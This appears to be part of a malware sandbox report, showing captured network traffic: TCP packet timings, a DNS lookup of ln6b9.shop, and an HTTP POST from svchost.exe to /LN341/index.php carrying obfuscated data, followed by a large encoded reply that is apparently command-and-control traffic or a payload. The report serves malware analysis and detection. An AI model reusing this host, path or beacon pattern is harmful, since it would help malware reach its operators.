                                Aug 29, 2024 22:47:03.165252924 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165266991 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165272951 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165283918 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165292978 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165308952 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165313005 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165329933 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165335894 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165340900 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165350914 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165359974 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165361881 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165378094 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165401936 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165463924 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165473938 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165484905 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165498018 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165514946 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165518045 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165525913 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165535927 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165546894 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165550947 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165558100 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165570974 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165571928 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165594101 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165596008 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165605068 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165613890 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165615082 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165626049 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165638924 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165642023 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165653944 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165666103 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165685892 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165735006 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165745974 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165755033 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165766001 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165776014 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165776014 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165786982 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165792942 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165798903 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165808916 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165817976 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165821075 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.165847063 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.165854931 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.166156054 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.166166067 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.166174889 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.166192055 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.166198015 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.166208029 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.166212082 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.166218996 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.166239977 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.166249037 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.166589022 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.166605949 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.166625977 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.166641951 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.167068958 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.167093039 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.167103052 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.167110920 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.167126894 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.167145014 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.167186022 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.167196035 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.167206049 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.167217016 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.167224884 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.167227030 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.167258978 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.237291098 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237303972 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237315893 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237334013 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.237355947 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.237360954 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237371922 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237380981 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237391949 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237400055 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.237401009 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237418890 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.237432003 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.237893105 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237901926 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237912893 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237936020 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.237946987 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.237957001 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237967014 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237991095 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.237993956 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238001108 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.238010883 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.238014936 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238027096 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238048077 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238516092 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.238552094 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238564014 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.238581896 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.238599062 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.238600016 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238609076 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.238614082 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238635063 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238637924 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.238650084 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.238651037 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238660097 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.238665104 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238683939 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.238704920 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239034891 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239046097 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239063025 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239068985 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239075899 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239085913 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239095926 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239097118 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239106894 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239118099 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239123106 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239145041 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239166021 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239535093 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239545107 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239556074 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239567995 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239573956 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239581108 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239583015 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239593983 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239598989 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239604950 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239614964 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.239617109 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.239645004 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240104914 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240150928 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240164995 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240202904 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240258932 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240294933 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240298033 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240309954 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240333080 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240334988 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240344048 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240346909 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240361929 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240367889 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240386009 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240403891 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240407944 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240434885 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240442991 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240446091 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240457058 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240467072 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240468979 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240478039 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240485907 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240494013 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240494967 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.240521908 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240541935 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.240988970 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.241027117 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251545906 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251564980 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251578093 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251590967 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251616001 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251641989 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251652002 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251663923 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251676083 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251688957 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251699924 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251699924 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251709938 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251724005 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251734018 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251744986 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251751900 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251754999 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251765966 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251770973 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251777887 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251789093 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251791000 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251816988 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251821041 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251853943 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251858950 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251868010 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251892090 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251909971 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251936913 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251948118 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251957893 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251969099 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251979113 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.251981974 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.251991034 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.252002954 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.252017021 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.252038956 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.256759882 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.261645079 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.836076975 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.840970993 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.841041088 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.841146946 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.841192007 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.845963955 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.846028090 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.846049070 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.846059084 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.846067905 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.846101999 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.846110106 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.846118927 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.846127033 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.846136093 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.846143961 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.846153975 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.846154928 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.846163988 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.846174002 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.846211910 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.846224070 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.851016998 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.851032972 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.851042032 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.851051092 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.851066113 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.851073980 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.851082087 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:03.851092100 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.851113081 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:03.892570972 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:07.607481956 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:07.607646942 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:07.607677937 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:07.608206034 CEST8049731104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:07.608287096 CEST4973180192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:07.612452030 CEST8049731104.21.2.6192.168.2.4

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 29, 2024 22:46:57.682519913 CEST6296753192.168.2.41.1.1.1
                                Aug 29, 2024 22:46:57.827192068 CEST53629671.1.1.1192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Aug 29, 2024 22:46:57.682519913 CEST192.168.2.41.1.1.10xa697Standard query (0)ln6b9.shopA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Aug 29, 2024 22:46:57.827192068 CEST1.1.1.1192.168.2.40xa697No error (0)ln6b9.shop104.21.2.6A (IP address)IN (0x0001)false
                                Aug 29, 2024 22:46:57.827192068 CEST1.1.1.1192.168.2.40xa697No error (0)ln6b9.shop172.67.128.117A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • ln6b9.shop

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449730104.21.2.6805180C:\Windows\SysWOW64\svchost.exe
                                TimestampBytes transferredDirectionData
                                Aug 29, 2024 22:46:57.837440968 CEST266OUTPOST /LN341/index.php HTTP/1.1
                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                Host: ln6b9.shop
                                Content-Length: 103
                                Cache-Control: no-cache
                                Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6d ef 47 70 9d 3b 70 9d 35 70 9d 34 70 9d 3b 13 8b 31 11 8b 30 67 ef 45 70 9d 33 70 9d 3b 16 8b 30 66 8b 30 62 8b 31 11 eb 26 66 9a 42 16 8b 30 64 eb 45 70 9d 34
                                Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410mGp;p5p4p;10gEp3p;0f0b1&fB0dEp4
                                Aug 29, 2024 22:46:59.502288103 CEST1236INHTTP/1.1 200 OK
                                Date: Thu, 29 Aug 2024 20:46:59 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                X-Powered-By: PHP/5.6.37
                                Vary: Accept-Encoding,User-Agent
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZOvBVwHllrI6Xx1xRC23hpHwo9tRM8AS2jU85iccsX0%2FJ7Oa1Cc0G6BBwRPaUFgO5x5x8nx2rlp1jijXCd88jCHjkez91zI8clh270K6FYtGL6vIPJ%2Bjn03ehSN"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8baf64be0c8d7280-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 34 34 37 31 0d 0a 3f 36 90 4f 06 dd 77 1e d7 33 21 e2 50 65 dc 4f 04 9e 48 07 c9 68 2d ed 50 03 f8 56 65 f8 50 00 e8 49 05 fc 68 39 e3 51 06 f8 60 07 e9 55 2f cf 30 07 d8 60 13 d9 49 1e c7 36 65 cb 4b 04 dd 48 3c 9b 68 37 9c 4e 24 e2 40 3a db 66 12 d6 79 1e c9 68 2f e3 42 3e dc 40 06 9e 49 11 ff 73 12 ed 57 1c e4 49 03 f8 57 07 f8 49 04 fb 68 6c e9 50 00 d6 45 1f f8 7b 10 cc 31 1b 9f 61 02 f8 76 31 e6 4d 36 ed 50 3a db 67 1d c6 33 19 ed 6c 20 f4 44 6c c4 48 3c d9 72 19 c0 6b 26 cd 7a 3a e4 4e 2f ef 49 1e d9 68 21 ed 52 65 e5 50 04 c5 37 19 c4 52 67 e2 69 10 d7 4e 2c 9a 79 18 d4 73 03 fb 74 65 e5 3f 7a cd 3d 69 c0 3d fc bb 5a 79 0b 15 48 d8 a2 5e b3 61 f2 b9 56 79 05 09 0b dc a4 5c fb 2f f1 fa 1e 65 4b 56 4b cb a7 5c a4 4f c7 5b 33 57 66 66 65 ab cb 30 9e fd 62 cb 33 ec 66 66 65 af cb 30 9e 42 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e ba 9d cb 33 5a 79 dc 6b af 7f 39 53 23 25 ca 7f 99 47 32 0d c6 b8 10 ee 70 f2 ac 41 35 0b 46 06 ce a5 5e [TRUNCATED]
                                Data Ascii: 4471?6Ow3!PeOHh-PVePIh9Q`U/0`I6eKH<h7N$@:fyh/B>@IsWIWIhlPE{1av1M6P:g3l DlH<rk&z:N/Ih!ReP7RgiN,yste?z=i=ZyH^aVy\/eKVK\O[3Wffe0b3ffe0B3Tffe03Tffe03Tffe03Zyk9S#%G2pA5F^vVt^F9=&3Tffet;_j0UjCQ1UjS#fe2'Tffe0_gho03Tffe03TFfe03Tdfe03^ffe03Tdfe06Tfbe03Tvfe03Twfe03Tffe03Tffe03l[fe03Tvfe03Tffe0
                                Aug 29, 2024 22:46:59.502302885 CEST224INData Raw: 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 2c e9 ae 4b 20 66 66 65 84 cf 30 9e 02 8d cb 33 54 60 66 65 af
                                Data Ascii: 3Tffe03Tffe03Tffe03Tffe03Tffe0,K ffe03T`fe03Tffe0"Sz03TFfe03Tffe03ff%0'Tffe093vfe03D030ffe?03Tffe.q23Dffe03Tff
                                Aug 29, 2024 22:46:59.502311945 CEST1236INData Raw: 65 fd 98 74 cd 4f df 0e f0 86 c6 53 68 e8 72 08 08 25 3e af c6 55 66 66 65 ce bb 59 b3 6f ee e6 44 3d 08 4b 06 c0 b9 55 b3 61 f2 a5 40 3b 0a 03 48 c3 fa 1d af 2f ad e5 43 30 04 66 65 af cb 30 9e 02 8d cb 33 00 66 66 65 81 b9 54 ff 76 fc cb 33 00
                                Data Ascii: etOShr%>UffeYoD=KUa@;H/C0fe03ffeTv3vfe0,R BTe3Twfe0,R fe0b3z34Ffe?0,A7BVW03Tffe03D03Uffe03|wfe03wfe0.3tfe>03tfe
                                Aug 29, 2024 22:46:59.502324104 CEST1236INData Raw: 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54
                                Data Ascii: e03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe13Lff
                                Aug 29, 2024 22:46:59.502334118 CEST1236INData Raw: 65 af cb 30 9e 3a a0 cb 33 54 64 64 65 9f 49 0d bb 04 94 e1 b5 1c e0 91 68 ae cc 32 3e 80 a0 dd 03 d6 5b 74 67 ae ca 01 95 32 94 cd 36 7f 68 65 67 b5 ce 30 ae 4e 9b c1 18 52 67 62 64 2d fc 32 9f 06 3d f5 03 68 56 71 63 a5 e0 36 9f 06 9c 49 04 56
